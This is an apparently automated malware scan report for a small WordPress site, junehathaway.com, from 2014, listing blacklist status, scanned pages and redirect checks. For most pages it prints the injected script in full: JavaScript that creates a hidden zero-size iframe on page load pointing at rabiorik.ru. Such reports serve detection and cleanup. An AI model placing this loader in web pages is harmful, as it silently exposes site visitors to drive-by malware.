Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=junehathaway.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://junehathaway.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://junehathaway.com/ | 200 OK Content-Length: 22189 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('q7r17p');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="q7r17p";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function lnakbnq(){create_frame("http://rabiorik.ru/zqjxwqa.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',lnakbnq)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();lnakbnq()};window.onload=newonload}else{window.onload=lnakbnq}}}catch(err){} Decoded script: function lnakbnq() { create_frame("http://rabiorik.ru/zqjxwqa.cgi?default"); } | ||
http://junehathaway.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://junehathaway.com/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/javascript | clean |
http://junehathaway.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1 | 200 OK Content-Length: 927 Content-Type: application/javascript | clean |
http://junehathaway.com/wp-includes/js/tw-sack.js?ver=1.6.1 | 200 OK Content-Length: 3619 Content-Type: application/javascript | clean |
http://junehathaway.com/contact | 200 OK Content-Length: 16613 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('174tt');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="174tt";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function tknxi3i(){create_frame("http://rabiorik.ru/rxqbhuh.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',tknxi3i)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();tknxi3i()};window.onload=newonload}else{window.onload=tknxi3i}}}catch(err){} Decoded script: function tknxi3i() { create_frame("http://rabiorik.ru/rxqbhuh.cgi?default"); } | ||
http://junehathaway.com/about | 404 Not Found Content-Length: 12194 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('u76iqi');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="u76iqi";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function pnme5le(){create_frame("http://rabiorik.ru/fqmdozd.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',pnme5le)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();pnme5le()};window.onload=newonload}else{window.onload=pnme5le}}}catch(err){} Decoded script: function pnme5le() { create_frame("http://rabiorik.ru/fqmdozd.cgi?default"); } | ||
http://junehathaway.com/clients | 200 OK Content-Length: 17007 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('tt1r');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="tt1r";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function iigbkag(){create_frame("http://rabiorik.ru/hhewxje.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',iigbkag)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();iigbkag()};window.onload=newonload}else{window.onload=iigbkag}}}catch(err){} Decoded script: function iigbkag() { create_frame("http://rabiorik.ru/hhewxje.cgi?default"); } | ||
http://junehathaway.com/test404page.js | 404 Not Found Content-Length: 12192 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rabiorik.ru ...[13474 bytes skipped]... > <script type='text/javascript'> function create_frame(a){var b=document.getElementById('wuerr');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="wuerr";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 5tdpsaa(){create_frame("http://rabiorik.ru/orlfkjj.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',5tdpsaa)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();5tdpsaa()};window.onload=newonload}else{window.onload=5tdpsaa}}}catch(err){} </script> | ||
http://junehathaway.com/http:/junehathaway.com/bellingham-on-tap-to-be-a-print-rag | 200 OK Content-Length: 18624 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('r1e4');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="r1e4";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function taks1x1(){create_frame("http://rabiorik.ru/rjxktbt.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',taks1x1)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();taks1x1()};window.onload=newonload}else{window.onload=taks1x1}}}catch(err){} Decoded script: function taks1x1() { create_frame("http://rabiorik.ru/rjxktbt.cgi?default"); } | ||
http://junehathaway.com/http:/junehathaway.com/ | 404 Not Found Content-Length: 12194 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('u2t5q2');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="u2t5q2";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function pjiclbj(){create_frame("http://rabiorik.ru/fchnzwc.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',pjiclbj)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();pjiclbj()};window.onload=newonload}else{window.onload=pjiclbj}}}catch(err){} Decoded script: function pjiclbj() { create_frame("http://rabiorik.ru/fchnzwc.cgi?default"); } | ||
http://junehathaway.com/http:/junehathaway.com/bellingham-on-tap | 200 OK Content-Length: 18896 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('23y7u');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="23y7u";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function j1gzonp(){create_frame("http://rabiorik.ru/ctevgqf.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',j1gzonp)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();j1gzonp()};window.onload=newonload}else{window.onload=j1gzonp}}}catch(err){} Decoded script: function j1gzonp() { create_frame("http://rabiorik.ru/ctevgqf.cgi?default"); } | ||
http://junehathaway.com/http:/junehathaway.com/maniac-roasting-website | 200 OK Content-Length: 19530 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('6i4');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="6i4";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function gm13ebx(){create_frame("http://rabiorik.ru/emtudwb.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',gm13ebx)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();gm13ebx()};window.onload=newonload}else{window.onload=gm13ebx}}}catch(err){} Decoded script: function gm13ebx() { create_frame("http://rabiorik.ru/emtudwb.cgi?default"); } | ||
http://junehathaway.com/http:/junehathaway.com/new-website-for-grand-avenue-ale-house | 200 OK Content-Length: 18745 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('u3t7');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="u3t7";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function gpbzint(){create_frame("http://rabiorik.ru/efwvhqr.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',gpbzint)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();gpbzint()};window.onload=newonload}else{window.onload=gpbzint}}}catch(err){} Decoded script: function gpbzint() { create_frame("http://rabiorik.ru/efwvhqr.cgi?default"); } | ||
http://junehathaway.com/http:/junehathaway.com/author | 404 Not Found Content-Length: 12188 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('o25');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="o25";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function wj2bc23(){create_frame("http://rabiorik.ru/scywnyu.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',wj2bc23)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();wj2bc23()};window.onload=newonload}else{window.onload=wj2bc23}}}catch(err){} Decoded script: function wj2bc23() { create_frame("http://rabiorik.ru/scywnyu.cgi?default"); } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: junehathaway.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 09 Jun 2014 06:08:10 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=5d4bac16ce30d358f76ae1181e63a61e; path=/
X-Pingback: http://junehathaway.com/xmlrpc.php
GET / HTTP/1.1
Host: junehathaway.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 09 Jun 2014 06:08:10 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=5d4bac16ce30d358f76ae1181e63a61e; path=/
X-Pingback: http://junehathaway.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: junehathaway.com
Referer: http://www.google.com/search?q=junehathaway.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: junehathaway.com
Referer: http://www.google.com/search?q=junehathaway.com
Result:
The result is similar to the first query. There are no suspicious redirects found.